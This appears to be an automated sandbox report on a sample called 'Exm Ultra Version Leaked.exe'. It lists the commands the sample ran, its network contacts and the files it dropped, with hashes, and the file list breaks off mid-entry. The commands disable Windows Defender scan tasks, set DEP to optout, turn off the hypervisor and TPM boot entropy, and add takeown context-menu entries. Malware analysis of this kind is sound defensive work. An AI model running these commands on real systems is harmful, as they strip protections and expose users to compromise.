schtasks /Change /TN "Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Servicing\StartComponentCleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SettingSync\BackupTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SettingSync\NetworkStateChangeTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceAgentTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SpacePort\SpaceManagerTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Speech\SpeechModelDownloadTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\User Profile Service\HiveUploadTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\WCM\WiFiTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Media Sharing\UpdateLibrary" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Wininet\CacheTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Logon Synchronization" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Work Folders\Work Folders Maintenance Work" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Workplace Join\Automatic-Device-Join" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTaskLogon" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Driver Easy Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Office\Office ClickToRun Service Monitor" /Disable

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\netsh.exe

netsh int tcp set global rss=enable

C:\Windows\system32\netsh.exe

netsh int tcp set global autotuninglevel=normal

C:\Windows\system32\netsh.exe

netsh int tcp set global ecncapability=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global timestamps=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global initialrto=2000

C:\Windows\system32\netsh.exe

netsh int tcp set global maxsynretransmissions=2

C:\Windows\system32\netsh.exe

netsh int tcp set global rsc=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global nonsackrttresiliency=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global fastopen=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global fastopenfallback=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global hystart=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global pacingprofile=off

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick yes

C:\Windows\system32\bcdedit.exe

bcdedit /timeout 0

C:\Windows\system32\bcdedit.exe

bcdedit /set nx optout

C:\Windows\system32\bcdedit.exe

bcdedit /set bootux disabled

C:\Windows\system32\bcdedit.exe

bcdedit /set bootmenupolicy standard

C:\Windows\system32\bcdedit.exe

bcdedit /set hypervisorlaunchtype off

C:\Windows\system32\bcdedit.exe

bcdedit /set tpmbootentropy ForceDisable

C:\Windows\system32\bcdedit.exe

bcdedit /set quietboot yes

C:\Windows\system32\bcdedit.exe

bcdedit /set {globalsettings} custom:16000067 true

C:\Windows\system32\bcdedit.exe

bcdedit /set {globalsettings} custom:16000069 true

C:\Windows\system32\bcdedit.exe

bcdedit /set {globalsettings} custom:16000068 true

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "MUIVerb" /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /ve /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\exefile\shell\runas2\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Grant Admin Full Control" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas" /v "icon" /t REG_SZ /d "C:\Windows\system32\imageres.dll ,73" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\netsh.exe

netsh interface teredo set state disabled

C:\Windows\system32\netsh.exe

netsh interface 6to4 set state disabled

C:\Windows\system32\netsh.exe

netsh winsock reset

C:\Windows\system32\netsh.exe

netsh int isatap set state disable

C:\Windows\system32\netsh.exe

netsh int ip set global taskoffload=disabled

C:\Windows\system32\netsh.exe

netsh int ip set global neighborcachelimit=4096

C:\Windows\system32\netsh.exe

netsh int tcp set global timestamps=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set heuristics disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global autotuninglevel=disable

C:\Windows\system32\netsh.exe

netsh int tcp set global chimney=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global ecncapability=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global rss=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global rsc=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set global dca=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global netdma=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global nonsackrttresiliency=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set security mpp=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set security profiles=disabled

C:\Windows\system32\netsh.exe

netsh int ip set global icmpredirects=disabled

C:\Windows\system32\netsh.exe

netsh int tcp set security mpp=disabled profiles=disabled

C:\Windows\system32\netsh.exe

netsh int ip set global multicastforwarding=disabled

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell Disable-NetAdapterLso -Name "*"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=760 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterPowerManagement -Name $adapter.Name -ErrorAction SilentlyContinue}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "ForEach($adapter In Get-NetAdapter){Disable-NetAdapterLso -Name $adapter.Name -ErrorAction SilentlyContinue}"

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnableICMPRedirect" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "EnablePMTUDiscovery" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "Tcp1323Opts" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpMaxDupAcks" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpTimedWaitDelay" /t REG_DWORD /d "32" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "GlobalMaxTcpWindowSize" /t REG_DWORD /d "8760" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "TcpWindowSize" /t REG_DWORD /d "8760" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxConnectionsPerServer" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MaxUserPort" /t REG_DWORD /d "65534" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "SackOpts" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DefaultTTL" /t REG_DWORD /d "64" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_SZ /d "ffffffff" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5084 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | cdn.discordapp.com | udp
US | 8.8.8.8:53 | cdn.discordapp.com | udp
US | 8.8.8.8:53 | cdn.discordapp.com | udp
US | 162.159.135.233:443 | cdn.discordapp.com | udp
US | 162.159.135.233:443 | cdn.discordapp.com | tcp
US | 8.8.8.8:53 | business.bing.com | udp
US | 8.8.8.8:53 | business.bing.com | udp
US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp
US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp
US | 13.107.6.158:443 | business.bing.com | tcp
GB | 172.165.61.93:443 | nav-edge.smartscreen.microsoft.com | tcp
GB | 172.165.61.93:443 | nav-edge.smartscreen.microsoft.com | tcp
US | 8.8.8.8:53 | bzib.nelreports.net | udp
US | 8.8.8.8:53 | bzib.nelreports.net | udp
GB | 104.91.71.133:443 | bzib.nelreports.net | tcp
US | 8.8.8.8:53 | www.microsoft.com | udp
US | 8.8.8.8:53 | www.microsoft.com | udp
US | 8.8.8.8:53 | www.microsoft.com | udp
US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp
US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 158.6.107.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 133.71.91.104.in-addr.arpa | udp
GB | 2.17.5.133:443 | www.microsoft.com | tcp
US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp
US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp
GB | 172.165.69.228:443 | dl-edge.smartscreen.microsoft.com | tcp
N/A | 224.0.0.251:5353 | | udp
US | 8.8.8.8:53 | www.microsoft.com | udp
US | 8.8.8.8:53 | 133.5.17.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp
US | 8.8.8.8:53 | edgestatic.azureedge.net | udp
US | 8.8.8.8:53 | edgestatic.azureedge.net | udp
US | 8.8.8.8:53 | c.s-microsoft.com | udp
US | 8.8.8.8:53 | c.s-microsoft.com | udp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp
US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.200:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp
US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp
US | 20.231.121.79:80 | | tcp
US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp
US | 20.42.73.29:443 | nw-umwatson.events.data.microsoft.com | tcp
US | 8.8.8.8:53 | 29.73.42.20.in-addr.arpa | udp
US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp
US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp
US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp
GB | 92.123.128.149:443 | www.bing.com | tcp
US | 8.8.8.8:53 | 149.128.123.92.in-addr.arpa | udp
US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp
US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp
US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp
US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp
US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp
US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp
US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp
US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp
IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp
US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp
US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp
GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp
US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp
US | 8.8.8.8:53 | 169.96.87.13.in-addr.arpa | udp
US | 8.8.8.8:53 | blank-pd24u.in | udp
US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp
US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp
US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp
US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp
US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp
GB | 142.250.200.42:443 | chromewebstore.googleapis.com | tcp
US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp
US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 cd67ca4d88d40fbdc3fe1a395f98a8bc
SHA1 cfc0ab8e240ceeb0b41b66ec87c5aa22bee69a6a
SHA256 0b2c4c3de72fdbe44f3659da4f6ab476782bf7d256548d6cd0731912285d24d8
SHA512 cdd8fb31ad56b058f2272bcf14516f5fa9d9ceb3e2223a54e490ed5854af21080ad66753b2bcd9600bafe09923b45434bd6a263e662468f7a4136ab1115fd8e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9ae8e22e33a364417baa518871fa12b2
SHA1 0c85298bd65104351f836ac6d9a864f9f67f5340
SHA256 0528696653e86f522afd4052c9e2199a68ac37d4696f26630d235bbcc3f456c7
SHA512 55546aa6b9788c92cab046a4e3310d0ddda898e1caf2f8b463e1e01a9ef312c84e169222a2df5f1670ae6361043428350769dd8a702c214427457fec87fb74fa

\??\pipe\crashpad_3704_CYQSTATVKZCNFFYD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1698e1120853544014c2c544442c8460
SHA1 7b7ba208c30a35877e7f701dfb5f6c0b18051d8a
SHA256 ab8f567d01c89445b79aac419d903341218e00f6d23b7f6dfcedb3f4ae50ce4e
SHA512 475d1b0908f57ada5d3ed41b70f04e762f913c0985226c870cdca05e5a614eeb61e76d46dc97e806637af4bf9ceff0864e94a5740cfa674af6f91b6f7894a2c8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c1afed0d0e0f93b545789393104793e0
SHA1 b9ed8d1b04026bfdbd19946161ebb1060c8292cb
SHA256 78d1a29ec3454828248eb2a01016deba629a87a969fdd68ca87f81651f5c77d2
SHA512 c7b6e81cbb699da7eda5087eccf948fdbfa024f33e7160f01a1706c5466b232d91c5fd0a769ca41c0619821f475e2554be9f0f28c788d9948e925fb463ee5aef

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe

MD5 5c8fc4049f875577ac6722806184391c
SHA1 f23617e724154cb34604149f296b8e7563d8d2c7
SHA256 a6d6b6adfcb46e203c7ec8684f343d533097291723dd375890351e5d1e39b204
SHA512 5087b04a7665819efc8380b96b392f0aa23ac38a11e1e4713a782d178571328f912352e4dd2bf1b5ecb3afe1aa1a971477aeb8c16a01580983bc9eec800b4b9e

C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe

MD5 649b38a3433d7ae4bd11a5de40e71ab6
SHA1 a4847bb6b9203354c3f39250897b557e55b59df4
SHA256 b7a04367704dca447f089fb3bca0aa1a36d2d930bfc524d399a57f125e46f8c4
SHA512 57a5c66197e95e97ad47acfa4688c30e0d5f75af12d3552054d71d336c9b4788e9cc86351cc2317c5760de0d9a8cf9f9e75c1cbf0492ca018b471220f4d55ad5

C:\Users\Admin\AppData\Local\Temp\_MEI17362\ucrtbase.dll

MD5 8e7680a8d07c3c4159241d31caaf369c
SHA1 62fe2d4ae788ee3d19e041d81696555a6262f575
SHA256 36cc22d92a60e57dee394f56a9d1ed1655ee9db89d2244a959005116a4184d80
SHA512 9509f5b07588a08a490f4c3cb859bbfe670052c1c83f92b9c3356afa664cb500364e09f9dafac7d387332cc52d9bb7bb84ceb1493f72d4d17ef08b9ee3cb4174

C:\Users\Admin\AppData\Local\Temp\_MEI17362\python310.dll

MD5 01988415e8fb076dcb4a0d0639b680d9
SHA1 91b40cffcfc892924ed59dc0664c527ff9d3f69c
SHA256 b101db1ddd659b8d8ffd8b26422fde848d5b7846e0c236f051fadb9412de6e24
SHA512 eab0c3ca4578751a671beb3da650b5e971a79798deb77472e42f43aa2bea7434ad5228a8fddbfff051ce05054dbf3422d418f42c80bc3640e0e4f43a0cf2ebbe

C:\Users\Admin\AppData\Local\Temp\_MEI17362\python310.dll

MD5 4e02de9a0e676fb8f740fc047a04a5ca
SHA1 f96328455f7966ffd6926dc450882083afdc624d
SHA256 e9aa0dc8f9c8b79013337c9a67c496454337e0ff3557074709fb2806093d2c7d
SHA512 253ebbb93e59e315e06bde92ca83976b48a99f6a7619020fb453edf72808cf07fcbef3cf1090377011ab84c12c66972a6a27d79f4b2f877cfd2dc41a2f73a1c6

C:\Users\Admin\AppData\Local\Temp\_MEI17362\VCRUNTIME140.dll

MD5 6c1f9732533e4623a6cd0af49f7b40fa
SHA1 7d26b539ef7becf120c4306c9fa21a26e71203e0
SHA256 16d99b5afc24638508b51acf60a5b5e1492d1deda620ef7c79baef4791340ab7
SHA512 360d3c38f07189711aaa9679db21e56cb729b9f81c642363dde3543570edec4c162e4457f4d6531fe47248f7f5ee71eb116c523c3233b81ee183f65cc986afc9

C:\Users\Admin\AppData\Local\Temp\_MEI17362\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

memory/2812-159-0x00007FF9D3730000-0x00007FF9D3B9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17362\base_library.zip

MD5 b71c1e073b7a1bb2e4f87767eb17bf63
SHA1 452cebd6aff011e96f36c600bbc46ef18f2d8996
SHA256 927b335f7088b8a9f8509f99e59e5a86435a4a691a85a889a5bc6833a3a3381e
SHA512 11147deaffe0a1bbe3702da0a771cf32245adbedd10543542f49aae124638b5c9facdacfb216825544e2e985cba43eabe6f52404bd6e792b65719ad30e1d683b

C:\Users\Admin\AppData\Local\Temp\_MEI17362\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

C:\Users\Admin\AppData\Local\Temp\_MEI17362\_ctypes.pyd

MD5 b3a39eab934c679cae09c03e61e44d3f
SHA1 e3d7e9770089de36bc69c8527250dbfac51367b7
SHA256 083fd5b8871869fb5571046e1c5336b0ca9b6e8dbc3d00983d81badd28a46ee2
SHA512 5704b9618e1a3750145e7e735890b646cf4cd0793a23628d2e70a263cd8bd77b12b55f3b9cb7f0b40da402507db994403e8d9fecb69f01865a3c56c6456c5cb6

C:\Users\Admin\AppData\Local\Temp\_MEI17362\libssl-1_1.dll

MD5 eac369b3fde5c6e8955bd0b8e31d0830
